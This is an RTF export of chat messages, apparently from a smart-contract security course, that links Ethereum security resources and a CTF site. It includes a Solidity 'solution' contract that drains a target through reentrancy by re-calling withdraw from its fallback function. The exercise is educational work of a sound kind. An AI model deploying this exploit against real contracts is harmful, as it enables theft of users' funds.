{\rtf1\ansi\ansicpg1252\cocoartf2636
\cocoatextscaling0\cocoaplatform0{\fonttbl\f0\fnil\fcharset0 HelveticaNeue-Medium;\f1\fnil\fcharset0 HelveticaNeue;\f2\fnil\fcharset0 HelveticaNeue-Bold;
\f3\fnil\fcharset0 AndaleMono;}
{\colortbl;\red255\green255\blue255;\red43\green132\blue210;\red41\green43\blue48;\red0\green0\blue0;
\red222\green53\blue46;}
{\*\expandedcolortbl;;\cssrgb\c20392\c59608\c85882;\cssrgb\c21176\c22353\c24706;\cssrgb\c0\c0\c0;
\cssrgb\c90588\c29804\c23529;}
{\*\listtable{\list\listtemplateid1\listhybrid{\listlevel\levelnfc23\levelnfcn23\leveljc0\leveljcn0\levelfollow0\levelstartat1\levelspace360\levelindent0{\*\levelmarker \{none\}}{\leveltext\leveltemplateid1\'00;}{\levelnumbers;}\fi-360\li720\lin720 }{\listname ;}\listid1}}
{\*\listoverridetable{\listoverride\listid1\listoverridecount0\ls1}}
\paperw11900\paperh16840\margl1440\margr1440\vieww21040\viewh11920\viewkind0
\deftab720
\pard\tx220\tx720\pardeftab720\li720\fi-720\partightenfactor0
\ls1\ilvl0
\f0\fs24 \cf2 \cb3 		\expnd0\expndtw0\kerning0
\outl0\strokewidth0 \strokec2 Laurence Kirk
\fs18 \cf0 \strokec4  \'97 \cb1 \uc0\u8232 \cb3 12/07/2021
\f1\fs32 \cb1 \uc0\u8232 
\fs24 \cb3 Today's Links {\field{\*\fldinst{HYPERLINK "https://cosimo.gitbook.io/ethereum-security/smart-contract-weaknesses/price-oracle-manipulation"}}{\fldrslt 
\fs32 https://cosimo.gitbook.io/ethereum-security/smart-contract-weaknesses/price-oracle-manipulation}} {\field{\*\fldinst{HYPERLINK "https://cosimo.gitbook.io/ethereum-security/smart-contract-weaknesses/price-oracle-manipulation"}}{\fldrslt 
\fs32 https://cosimo.gitbook.io/ethereum-security/smart-contract-weaknesses/price-oracle-manipulation}} {\field{\*\fldinst{HYPERLINK "https://cosimo.gitbook.io/ethereum-security/"}}{\fldrslt 
\fs32 https://cosimo.gitbook.io/ethereum-security/}} {\field{\*\fldinst{HYPERLINK "https://blog.extropy.io/posts/ctf1.html"}}{\fldrslt 
\fs32 https://blog.extropy.io/posts/ctf1.html}} {\field{\*\fldinst{HYPERLINK "https://github.com/ethereumbook/ethereumbook/blob/develop/09smart-contracts-security.asciidoc"}}{\fldrslt 
\fs32 https://github.com/ethereumbook/ethereumbook/blob/develop/09smart-contracts-security.asciidoc}}\cb1 \uc0\u8232 
\fs32 \uc0\u8232 {\field{\*\fldinst{HYPERLINK "https://cosimo.gitbook.io/ethereum-security/smart-contract-weaknesses/price-oracle-manipulation"}}{\fldrslt 
\f2\b\fs24 \cb3 Price Oracle Manipulation}}
\f2\b\fs24 \uc0\u8232 {\field{\*\fldinst{HYPERLINK "https://app.gitbook.com/share/space/thumbnail/-MT_1xrE7o28ej0HwOCr.png?color=%23AE00FF&logo=&theme=none"}}{\fldrslt 
\f1\b0\fs32 {{\NeXTGraphic -MT_1xrE7o28ej0HwOCr.png \width3200 \height1680 \appleattachmentpadding0 \appleembedtype0 \appleaqc
}¬}\
}}\pard\tx220\tx720\pardeftab720\li720\fi-720\partightenfactor0
\ls1\ilvl0
\f1\b0\fs32 \cf0 \kerning1\expnd0\expndtw0 \outl0\strokewidth0 		\expnd0\expndtw0\kerning0
\outl0\strokewidth0 \strokec4 \uc0\u8232 {\field{\*\fldinst{HYPERLINK "https://cosimo.gitbook.io/ethereum-security/"}}{\fldrslt 
\f2\b\fs24 \cb3 Ethereum Security}}
\f2\b\fs24 \uc0\u8232 {\field{\*\fldinst{HYPERLINK "https://app.gitbook.com/share/space/thumbnail/-MT_1xrE7o28ej0HwOCr.png?color=%23AE00FF&logo=&theme=none"}}{\fldrslt 
\f1\b0\fs32 {{\NeXTGraphic -MT_1xrE7o28ej0HwOCr.png \width3200 \height1680 \appleattachmentpadding0 \appleembedtype0 \appleaqc
}¬}\
}}\ls1\ilvl0
\f1\b0\fs32 \kerning1\expnd0\expndtw0 \outl0\strokewidth0 		\expnd0\expndtw0\kerning0
\outl0\strokewidth0 \strokec4 \uc0\u8232 
\fs24 \cb3 GitHub
\fs18 \cb1 \uc0\u8232 {\field{\*\fldinst{HYPERLINK "https://github.com/ethereumbook/ethereumbook/blob/develop/09smart-contracts-security.asciidoc"}}{\fldrslt 
\f2\b\fs24 \cb3 ethereumbook/09smart-contracts-security.asciidoc at develop \'b7 ether...}}
\f2\b\fs24 \uc0\u8232 
\f1\b0\fs21 \cb3 Mastering Ethereum, by Andreas M. Antonopoulos, Gavin Wood - ethereumbook/09smart-contracts-security.asciidoc at develop \'b7 ethereumbook/ethereumbook\cb1 \uc0\u8232 {\field{\*\fldinst{HYPERLINK "https://opengraph.githubassets.com/4a83027d4c5a4f33ee2648ca6409de0fe3f3ee8aa30725db496bed4077bb0dff/ethereumbook/ethereumbook"}}{\fldrslt 
\fs32 {{\NeXTGraphic ethereumbook.png \width16000 \height8000 \appleattachmentpadding0 \appleembedtype0 \appleaqc
}¬}\
}}\ls1\ilvl0
\fs32 \kerning1\expnd0\expndtw0 \outl0\strokewidth0 		\expnd0\expndtw0\kerning0
\outl0\strokewidth0 \strokec4 \uc0\u8232 {{\NeXTGraphic 08c0a077780263f3df97613e58e71744.svg \width640 \height640 \appleattachmentpadding0 \appleembedtype0 \appleaqc
}¬}\
\pard\tx220\tx720\pardeftab720\li720\fi-720\qc\partightenfactor0
\ls1\ilvl0
\f0\fs21 \cf0 \cb3 \kerning1\expnd0\expndtw0 \outl0\strokewidth0 		\expnd0\expndtw0\kerning0
\outl0\strokewidth0 \strokec4 1\cb1 \uc0\u8232 
\f1\fs32 \uc0\u8232 \u8232 \u8232 \u8232 \u8232 \u8232 \u8232 \u8232 \u8232 \
\pard\tx220\tx720\pardeftab720\li720\fi-720\qr\partightenfactor0
\ls1\ilvl0
\f0\fs16\fsmilli8250 \cf0 \cb3 \kerning1\expnd0\expndtw0 \outl0\strokewidth0 		\expnd0\expndtw0\kerning0
\outl0\strokewidth0 \strokec4 [\cb1 \uc0\u8232 \cb3 12:03 PM]\cb1 \uc0\u8232 \u8232 {\field{\*\fldinst{HYPERLINK "http://hack.extropy.io:3000/"}}{\fldrslt 
\f1\fs32 \cb3 http://hack.extropy.io:3000/}}
\f1\fs24 \uc0\u8232 
\fs32 \uc0\u8232 {\field{\*\fldinst{HYPERLINK "http://hack.extropy.io:3000/"}}{\fldrslt 
\f2\b\fs24 \cb3 React App}}
\f2\b\fs24 \uc0\u8232 
\f1\b0\fs21 \cb3 Web site created using create-react-app\cb1 \uc0\u8232 
\fs32 \
\pard\tx220\tx720\pardeftab720\li720\fi-720\partightenfactor0
\ls1\ilvl0\cf0 \kerning1\expnd0\expndtw0 \outl0\strokewidth0 		\expnd0\expndtw0\kerning0
\outl0\strokewidth0 \strokec4 {{\NeXTGraphic 7c8f476123d28d103efe381543274c25.png \width5120 \height5120 \appleattachmentpadding0 \appleembedtype0 \appleaqc
}¬}\
\pard\tx220\tx720\pardeftab720\li720\fi-720\partightenfactor0
\ls1\ilvl0
\f0\fs24 \cf5 \cb3 \kerning1\expnd0\expndtw0 \outl0\strokewidth0 		\expnd0\expndtw0\kerning0
\outl0\strokewidth0 \strokec5 cosimo
\fs18 \cf0 \strokec4  \'97 \cb1 \uc0\u8232 \cb3 12/07/2021
\f1\fs32 \cb1 \uc0\u8232 
\fs24 \cb3 Solution to today's excercise: 
\f3\fs21 pragma solidity 0.6.0;\
\pard\tx220\tx720\pardeftab720\li720\fi-720\partightenfactor0
\ls1\ilvl0\cf0 \kerning1\expnd0\expndtw0 \outl0\strokewidth0 		\expnd0\expndtw0\kerning0
\outl0\strokewidth0 \strokec4 \
\ls1\ilvl0\kerning1\expnd0\expndtw0 \outl0\strokewidth0 		\expnd0\expndtw0\kerning0
\outl0\strokewidth0 \strokec4 import "./Level_2_Reentrancy.sol";\
\ls1\ilvl0\kerning1\expnd0\expndtw0 \outl0\strokewidth0 		\expnd0\expndtw0\kerning0
\outl0\strokewidth0 \strokec4 \
\ls1\ilvl0\kerning1\expnd0\expndtw0 \outl0\strokewidth0 		\expnd0\expndtw0\kerning0
\outl0\strokewidth0 \strokec4 contract Level_2_Reentrancy_Solution \{\
\ls1\ilvl0\kerning1\expnd0\expndtw0 \outl0\strokewidth0 		\expnd0\expndtw0\kerning0
\outl0\strokewidth0 \strokec4   Level_2_Reentrancy public token;\
\ls1\ilvl0\kerning1\expnd0\expndtw0 \outl0\strokewidth0 		\expnd0\expndtw0\kerning0
\outl0\strokewidth0 \strokec4 \
\ls1\ilvl0\kerning1\expnd0\expndtw0 \outl0\strokewidth0 		\expnd0\expndtw0\kerning0
\outl0\strokewidth0 \strokec4   // intialize the etherStore variable with the contract address\
\ls1\ilvl0\kerning1\expnd0\expndtw0 \outl0\strokewidth0 		\expnd0\expndtw0\kerning0
\outl0\strokewidth0 \strokec4   constructor(address _tokenAddress) public \{\
\ls1\ilvl0\kerning1\expnd0\expndtw0 \outl0\strokewidth0 		\expnd0\expndtw0\kerning0
\outl0\strokewidth0 \strokec4       token = Level_2_Reentrancy(_tokenAddress);\
\ls1\ilvl0\kerning1\expnd0\expndtw0 \outl0\strokewidth0 		\expnd0\expndtw0\kerning0
\outl0\strokewidth0 \strokec4   \}\
\ls1\ilvl0\kerning1\expnd0\expndtw0 \outl0\strokewidth0 		\expnd0\expndtw0\kerning0
\outl0\strokewidth0 \strokec4 \
\ls1\ilvl0\kerning1\expnd0\expndtw0 \outl0\strokewidth0 		\expnd0\expndtw0\kerning0
\outl0\strokewidth0 \strokec4   function attackToken() external payable \{\
\ls1\ilvl0\kerning1\expnd0\expndtw0 \outl0\strokewidth0 		\expnd0\expndtw0\kerning0
\outl0\strokewidth0 \strokec4       // attack to the nearest ether\
\ls1\ilvl0\kerning1\expnd0\expndtw0 \outl0\strokewidth0 		\expnd0\expndtw0\kerning0
\outl0\strokewidth0 \strokec4       require(msg.value >= 1 ether);\
\ls1\ilvl0\kerning1\expnd0\expndtw0 \outl0\strokewidth0 		\expnd0\expndtw0\kerning0
\outl0\strokewidth0 \strokec4       // send eth to the depositFunds() function\
\ls1\ilvl0\kerning1\expnd0\expndtw0 \outl0\strokewidth0 		\expnd0\expndtw0\kerning0
\outl0\strokewidth0 \strokec4       token.deposit.value(1 ether)();\
\ls1\ilvl0\kerning1\expnd0\expndtw0 \outl0\strokewidth0 		\expnd0\expndtw0\kerning0
\outl0\strokewidth0 \strokec4       // start the magic\
\ls1\ilvl0\kerning1\expnd0\expndtw0 \outl0\strokewidth0 		\expnd0\expndtw0\kerning0
\outl0\strokewidth0 \strokec4       token.withdraw(1 ether);\
\ls1\ilvl0\kerning1\expnd0\expndtw0 \outl0\strokewidth0 		\expnd0\expndtw0\kerning0
\outl0\strokewidth0 \strokec4   \}\
\ls1\ilvl0\kerning1\expnd0\expndtw0 \outl0\strokewidth0 		\expnd0\expndtw0\kerning0
\outl0\strokewidth0 \strokec4   \
\ls1\ilvl0\kerning1\expnd0\expndtw0 \outl0\strokewidth0 		\expnd0\expndtw0\kerning0
\outl0\strokewidth0 \strokec4   function cashOut() public \{\
\ls1\ilvl0\kerning1\expnd0\expndtw0 \outl0\strokewidth0 		\expnd0\expndtw0\kerning0
\outl0\strokewidth0 \strokec4       //msg.sender.transfer(address(this).balance);\
\ls1\ilvl0\kerning1\expnd0\expndtw0 \outl0\strokewidth0 		\expnd0\expndtw0\kerning0
\outl0\strokewidth0 \strokec4       uint256 _value = token.totalSupply();\
\ls1\ilvl0\kerning1\expnd0\expndtw0 \outl0\strokewidth0 		\expnd0\expndtw0\kerning0
\outl0\strokewidth0 \strokec4       token.transfer(msg.sender, _value);\
\ls1\ilvl0\kerning1\expnd0\expndtw0 \outl0\strokewidth0 		\expnd0\expndtw0\kerning0
\outl0\strokewidth0 \strokec4   \}\
\ls1\ilvl0\kerning1\expnd0\expndtw0 \outl0\strokewidth0 		\expnd0\expndtw0\kerning0
\outl0\strokewidth0 \strokec4   function transferBalance() public \{\
\ls1\ilvl0\kerning1\expnd0\expndtw0 \outl0\strokewidth0 		\expnd0\expndtw0\kerning0
\outl0\strokewidth0 \strokec4       msg.sender.transfer(address(this).balance);\
\ls1\ilvl0\kerning1\expnd0\expndtw0 \outl0\strokewidth0 		\expnd0\expndtw0\kerning0
\outl0\strokewidth0 \strokec4   \}\
\ls1\ilvl0\kerning1\expnd0\expndtw0 \outl0\strokewidth0 		\expnd0\expndtw0\kerning0
\outl0\strokewidth0 \strokec4 \
\ls1\ilvl0\kerning1\expnd0\expndtw0 \outl0\strokewidth0 		\expnd0\expndtw0\kerning0
\outl0\strokewidth0 \strokec4 \
\ls1\ilvl0\kerning1\expnd0\expndtw0 \outl0\strokewidth0 		\expnd0\expndtw0\kerning0
\outl0\strokewidth0 \strokec4   fallback() external payable \{\
\ls1\ilvl0\kerning1\expnd0\expndtw0 \outl0\strokewidth0 		\expnd0\expndtw0\kerning0
\outl0\strokewidth0 \strokec4       if (address(token).balance > 0.9 ether) \{\
\ls1\ilvl0\kerning1\expnd0\expndtw0 \outl0\strokewidth0 		\expnd0\expndtw0\kerning0
\outl0\strokewidth0 \strokec4           token.withdraw(0.1 ether);\
\ls1\ilvl0\kerning1\expnd0\expndtw0 \outl0\strokewidth0 		\expnd0\expndtw0\kerning0
\outl0\strokewidth0 \strokec4       \}\
\ls1\ilvl0\kerning1\expnd0\expndtw0 \outl0\strokewidth0 		\expnd0\expndtw0\kerning0
\outl0\strokewidth0 \strokec4       //msg.sender.transfer(address(this).balance);\
\ls1\ilvl0\kerning1\expnd0\expndtw0 \outl0\strokewidth0 		\expnd0\expndtw0\kerning0
\outl0\strokewidth0 \strokec4   \}\
\ls1\ilvl0\kerning1\expnd0\expndtw0 \outl0\strokewidth0 		\expnd0\expndtw0\kerning0
\outl0\strokewidth0 \strokec4 \}\cb1 \uc0\u8232 
\fs18 \uc0\u8232 
\f1\fs24 \uc0\u8232 
\fs32 \uc0\u8232 \
\pard\tx220\tx720\pardeftab720\li720\fi-720\qr\partightenfactor0
\ls1\ilvl0
\f0\fs16\fsmilli8250 \cf0 \cb3 \kerning1\expnd0\expndtw0 \outl0\strokewidth0 		\expnd0\expndtw0\kerning0
\outl0\strokewidth0 \strokec4 [\cb1 \uc0\u8232 \cb3 1:02 PM]\cb1 \uc0\u8232 \u8232 
\f1\fs24 \cb3 remember to send 1 ether to fund it when deploying the solution contract\cb1 \uc0\u8232 
\fs32 \uc0\u8232 \u8232 \u8232 \u8232 \u8232 \u8232 \
\ls1\ilvl0
\f0\fs16\fsmilli8250 \cb3 \kerning1\expnd0\expndtw0 \outl0\strokewidth0 		\expnd0\expndtw0\kerning0
\outl0\strokewidth0 \strokec4 [\cb1 \uc0\u8232 \cb3 1:03 PM]\cb1 \uc0\u8232 \u8232 
\f1\fs24 \cb3 Resources * Gist with contracts: {\field{\*\fldinst{HYPERLINK "https://remix.ethereum.org/#gist=2e6d2ea22cc2b7d1394faa8c10b024cd&optimize=false&runs=200&evmVersion=null&version=soljson-v0.6.0+commit.26b70077.js"}}{\fldrslt 
\fs32 https://remix.ethereum.org/#gist=2e6d2ea22cc2b7d1394faa8c10b024cd&optimize=false&runs=200&evmVersion=null&version=soljson-v0.6.0+commit.26b70077.js}} * Useful resource on writing reentrancy contract: {\field{\*\fldinst{HYPERLINK "https://github.com/ethereumbook/ethereumbook/blob/develop/09smart-contracts-security.asciidoc#reentrancy"}}{\fldrslt 
\fs32 https://github.com/ethereumbook/ethereumbook/blob/develop/09smart-contracts-security.asciidoc#reentrancy}} * Blog Post on Oracle Attacks: {\field{\*\fldinst{HYPERLINK "https://extropy-io.medium.com/price-oracle-manipulation-d46fd413cc17"}}{\fldrslt 
\fs32 https://extropy-io.medium.com/price-oracle-manipulation-d46fd413cc17}} * Blogpost on CTF level 1: {\field{\*\fldinst{HYPERLINK "https://blog.extropy.io/posts/ctf1.html"}}{\fldrslt 
\fs32 https://blog.extropy.io/posts/ctf1.html}} * CTF website: {\field{\*\fldinst{HYPERLINK "http://hack.extropy.io:3000/"}}{\fldrslt 
\fs32 http://hack.extropy.io:3000/}}\cb1 \uc0\u8232 
\fs32 \uc0\u8232 \
}